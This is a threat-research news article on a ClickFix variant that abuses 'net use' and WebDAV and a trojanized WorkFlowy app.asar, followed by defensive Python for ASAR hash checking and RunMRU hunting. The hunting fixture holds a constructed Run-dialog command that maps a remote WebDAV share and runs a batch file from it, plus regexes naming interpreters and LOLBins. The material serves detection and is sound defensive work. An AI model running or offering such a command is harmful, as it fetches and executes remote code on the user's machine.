Researchers uncover sophisticated evolution of ClickFix technique that abuses Windows networking utilities and trojanized legitimate applications to bypass security controls.
New ClickFix Variant Uses WebDAV and Legitimate WorkFlowy App to Evade Detection
Security researchers from Atos have identified a concerning evolution in the ClickFix attack technique, where attackers are combining multiple methods to bypass modern security controls and evade detection. This new variant demonstrates how adversaries continue to adapt their tactics, moving beyond commonly abused scripting engines to leverage native Windows utilities and legitimate applications for malicious purposes.
The Evolution of ClickFix
ClickFix attacks, which trick users into executing commands through the Windows Run dialog (Win+R), have been a persistent threat. Previous variants typically relied on PowerShell, MSHTA, or other scripting interpreters that are heavily monitored by modern EDR solutions. This new variant represents a significant shift in tactics.
"This ClickFix variant is significant because it moves initial access away from commonly abused scripting and execution engines such as PowerShell, MSHTA, and WScript, and instead relies on net use to abuse WebDAV as a delivery mechanism," explain the Atos researchers in their threat report. "Previous ClickFix campaigns typically exposed themselves by directly invoking interpreters or living-off-the-land binaries that are heavily monitored by modern EDR solutions."
Attack Flow and Technique
The attack begins with a phishing page posing as a CAPTCHA check at "happyglamper[.]ro" that prompts the user to paste a command into the Run dialog. That command uses "net use" to map a WebDAV share on an attacker-controlled server as a network drive, then runs a batch file hosted on that share.

The executed batch file downloads a ZIP archive containing a trojanized version of the legitimate WorkFlowy application. Here's where the attack becomes particularly sophisticated:
- The attackers replaced the legitimate resources/app.asar file in the WorkFlowy application with a malicious version
- The malicious code runs in the Node.js main process of the Electron application, outside the Chromium sandbox
- This gives the malware full privileges of the logged-in user
- The malicious code includes a C2 beacon that communicates with a server every 2 seconds
- It also includes functionality to download and execute additional payloads from the C2 server
Why This Approach is Effective
"The malicious logic is hidden by replacing the content of the Workflowy application's app.asar archive with a trojanized version of main.js," the researchers note. "Because the code runs inside the Electron main process and remains packaged within a legitimate application, it avoids many file-based and behavioral detections that focus on standalone loaders or script interpreters. ASAR archives are rarely inspected, allowing the dropper logic to execute through normal application startup with minimal visibility."
Electron applications, which use web technologies packaged in .asar archives, present an attractive delivery mechanism for attackers. The malicious code runs with full Node.js privileges immediately on application launch, before the legitimate application code can execute.
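To make the .asar point concrete, the following is an added Python example (not Atos's code and not the Electron or asar projects' code) that parses the ASAR container format, hashes every packed file and diffs the result against a known-good baseline, which is how a defender would notice a swapped main.js without relying on the application to police itself. The two archives and their contents are constructed in memory as fixtures; against a real install you would read resources/app.asar from disk and keep the baseline hashes from a clean copy of the same version.

```python
import hashlib
import json
import struct

# Constructed fixtures standing in for a legitimate and a trojanized app.asar.
GOOD_FILES = {
    "package.json": b'{"name": "example-app", "main": "main.js"}',
    "main.js": b"const { app } = require('electron');\napp.whenReady().then(() => {});\n",
    "lib/util.js": b"module.exports = { add: (a, b) => a + b };\n",
}
TROJAN_FILES = dict(GOOD_FILES)
# The attacker keeps the legitimate code but prepends a stage that runs first in
# the Electron main process (placeholder only; no real beacon or network call).
TROJAN_FILES["main.js"] = (
    b"require('child_process'); /* beacon + download stage would go here */\n"
    + GOOD_FILES["main.js"]
)


def build_asar(files: dict[str, bytes]) -> bytes:
    """Pack {path: bytes} into an ASAR archive (directories split on '/')."""
    root = {"files": {}}
    blob = bytearray()
    for path, data in files.items():
        node = root
        *dirs, name = path.split("/")
        for d in dirs:
            node = node["files"].setdefault(d, {"files": {}})
        # ASAR stores offsets as decimal strings, relative to the start of file data.
        node["files"][name] = {"size": len(data), "offset": str(len(blob))}
        blob += data
    header_json = json.dumps(root).encode()
    padded = header_json + b"\0" * (-len(header_json) % 4)
    # The header is a Chromium Pickle: [payload size][string length][string, 4-byte aligned]
    header_pickle = struct.pack("<II", 4 + len(padded), len(header_json)) + padded
    # It is preceded by a second Pickle holding one UInt32: the header pickle's byte length.
    size_pickle = struct.pack("<II", 4, len(header_pickle))
    return size_pickle + header_pickle + bytes(blob)


def read_asar(data: bytes) -> tuple[dict, int]:
    """Parse the ASAR header. Returns (header, offset where file data begins)."""
    _, header_size = struct.unpack_from("<II", data, 0)
    _, str_len = struct.unpack_from("<II", data, 8)
    header = json.loads(data[16:16 + str_len])
    return header, 8 + header_size


def walk(node: dict, prefix: str = ""):
    """Yield (path, entry) for every file entry, recursing into directories."""
    for name, entry in node.get("files", {}).items():
        path = prefix + name
        if "files" in entry:
            yield from walk(entry, path + "/")
        else:
            yield path, entry


def file_hashes(data: bytes) -> dict[str, str]:
    """SHA-256 of every file packed inside the archive, keyed by path."""
    header, base = read_asar(data)
    hashes = {}
    for path, entry in walk(header):
        if entry.get("unpacked"):  # lives in app.asar.unpacked/, not in this blob
            continue
        start = base + int(entry["offset"])
        hashes[path] = hashlib.sha256(data[start:start + entry["size"]]).hexdigest()
    return hashes


def diff_against_baseline(data: bytes, baseline: dict[str, str]) -> dict[str, str]:
    """Compare an archive's per-file hashes with a known-good baseline."""
    current = file_hashes(data)
    changes = {}
    for path in sorted(set(current) | set(baseline)):
        if path not in baseline:
            changes[path] = "added"
        elif path not in current:
            changes[path] = "missing"
        elif current[path] != baseline[path]:
            changes[path] = "modified"
    return changes


if __name__ == "__main__":
    baseline = file_hashes(build_asar(GOOD_FILES))  # taken from a clean install
    print(diff_against_baseline(build_asar(TROJAN_FILES), baseline))
```

The baseline has to come from outside the package: Electron can enforce its own ASAR integrity check via a build-time fuse, but an attacker who redistributes the whole trojanized application controls that setting and any embedded hashes, so only a comparison against hashes you recorded independently (or the vendor's published ones) catches a replaced main.js.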
Detection Challenges and Hunting Approach
Perhaps most concerning is that this attack was not detected by Microsoft Defender for Endpoint. Atos security teams only identified it through targeted threat hunting focused on the RunMRU registry key, which records commands executed through the Run dialog.
"This activity was not detected by security controls and was only identified through targeted threat hunting at Atos," the researchers state. "Detection relied on analyzing execution context rather than payload indicators, specifically hunting for suspicious command execution originating from the Explorer Run dialog."
The hunting query they developed looks for suspicious command interpreters and living-off-the-land binaries written into the Explorer RunMRU registry key with explorer.exe as the initiating process. This approach focuses on the behavioral aspect of the ClickFix technique rather than trying to detect specific payloads.
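As an added example (not the Atos hunting query and not code from the report), the following Python reproduces the same hunting logic offline against a constructed set of RunMRU values: it orders the entries by the MRUList value, strips the "\1" terminator Windows appends to each stored command, and flags commands that invoke an interpreter or LOLBin, map a WebDAV share with net use, or launch a script from a UNC path or a freshly mapped drive letter. The sample commands, hostnames and IP address are constructed and are not the campaign's; `read_runmru()` reads the live key when run on a Windows host.

```python
import re
from dataclasses import dataclass

# Per-user registry key holding Run-dialog (Win+R) history.
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Constructed sample of RunMRU values (not real telemetry and not the campaign's
# actual command). Entries are REG_SZ values named a, b, c, ... whose data is
# "<command>\1"; the MRUList value lists those names, most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": r"notepad\1",
    "b": r"\\fileserver.corp.example\public\1",
    "c": r"mshta https://lure.example/verify.hta\1",
    "d": r"cmd /c net use Z: \\203.0.113.10@80\DavWWWRoot /user:guest x & Z:\setup.bat\1",
}

# Interpreters and LOLBins that a user has no ordinary reason to type into Run.
LOLBIN_RE = re.compile(
    r"(?<![\w.\\])(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|"
    r"msiexec|certutil|bitsadmin|curl|net|net1)(\.exe)?(?=\s|$)", re.I)
# WebDAV delivery: net use, the \\host@port or \\host@SSL UNC syntax, or DavWWWRoot.
WEBDAV_RE = re.compile(r"\bnet\s+use\b|\\\\[^\\\s]+@(ssl|\d+)(\\|\b)|davwwwroot", re.I)
# A script or binary launched from a UNC path or from a (just mapped) drive letter.
SCRIPT_RE = re.compile(
    r"(\\\\[^\\\s]+|\b[a-z]:)\\[^\s&|]*\.(bat|cmd|ps1|hta|vbs|js|exe|msi)\b", re.I)


def parse_runmru(values: dict[str, str]) -> list[tuple[str, str]]:
    """Return (value_name, command) pairs in MRU order, most recent first."""
    names = list(values.get("MRUList", "")) or sorted(k for k in values if k != "MRUList")
    entries = []
    for name in names:
        raw = values.get(name)
        if raw is None:
            continue
        entries.append((name, raw[:-2] if raw.endswith("\\1") else raw))
    return entries


def classify(command: str) -> list[str]:
    """Return the ClickFix indicators present in one Run-dialog command."""
    reasons = []
    if LOLBIN_RE.search(command):
        reasons.append("lolbin")          # interpreter / LOLBin invoked from Run
    if WEBDAV_RE.search(command):
        reasons.append("webdav")          # net use / WebDAV share mapping
    if SCRIPT_RE.search(command):
        reasons.append("remote-script")   # script launched from UNC or mapped drive
    return reasons


@dataclass
class Finding:
    name: str
    command: str
    reasons: list[str]


def hunt(values: dict[str, str]) -> list[Finding]:
    """Apply classify() to every RunMRU entry and keep the suspicious ones."""
    return [Finding(n, c, classify(c)) for n, c in parse_runmru(values) if classify(c)]


def read_runmru() -> dict[str, str]:
    """Read the live RunMRU key (Windows only; the import fails elsewhere)."""
    import winreg
    subkey = RUNMRU_KEY.split("\\", 1)[1]
    values: dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            values[name] = str(data)
            index += 1
    return values


if __name__ == "__main__":
    for finding in hunt(SAMPLE_RUNMRU):
        print(f"[{finding.name}] {finding.command}")
        print("    indicators:", ", ".join(finding.reasons))
```

Reading the key directly gives the command text but not the initiating process; the explorer.exe context the Atos hunt keys on comes from EDR registry-write telemetry, so in production the same classification would be applied to those events rather than to a point-in-time dump of the key, which also catches entries a script has since cleared.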
Practical Defense Recommendations
Based on this research, security teams should consider the following defensive measures:
- Monitor RunMRU registry activity: Implement detection for suspicious commands executed via the Run dialog, particularly those involving networking utilities like net use
- Enhance inspection of Electron applications: Consider adding detection for suspicious modifications to .asar files in Electron applications
- Implement network traffic analysis: Look for unusual connections to cloud services, especially those with short, regular intervals
- Expand threat hunting programs: Develop hypotheses based on adversary TTPs rather than just IOCs
- User education: Train users to be cautious of prompts asking them to execute commands via the Run dialog
IOCs and Further Reading
For organizations looking to detect this specific threat, Atos has provided the following IOCs:
- Domain: happyglamper[.]ro
- Domain: cloudflare[.]report
- IP: 94[.]156[.]170[.]255
- IP: 144[.]31[.]165[.]173
- File: %APPDATA%\id.txt
- SHA256: a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar)
The complete report with additional technical details and hunting queries can be found on the Atos CyberShield blog.
This new ClickFix variant serves as a reminder that adversaries continue to evolve their techniques, combining multiple methods to bypass security controls. As defensive technologies advance, attackers adapt by moving to less monitored techniques and abusing legitimate applications and system utilities. This underscores the importance of comprehensive defense strategies that include both preventive controls and proactive threat hunting capabilities.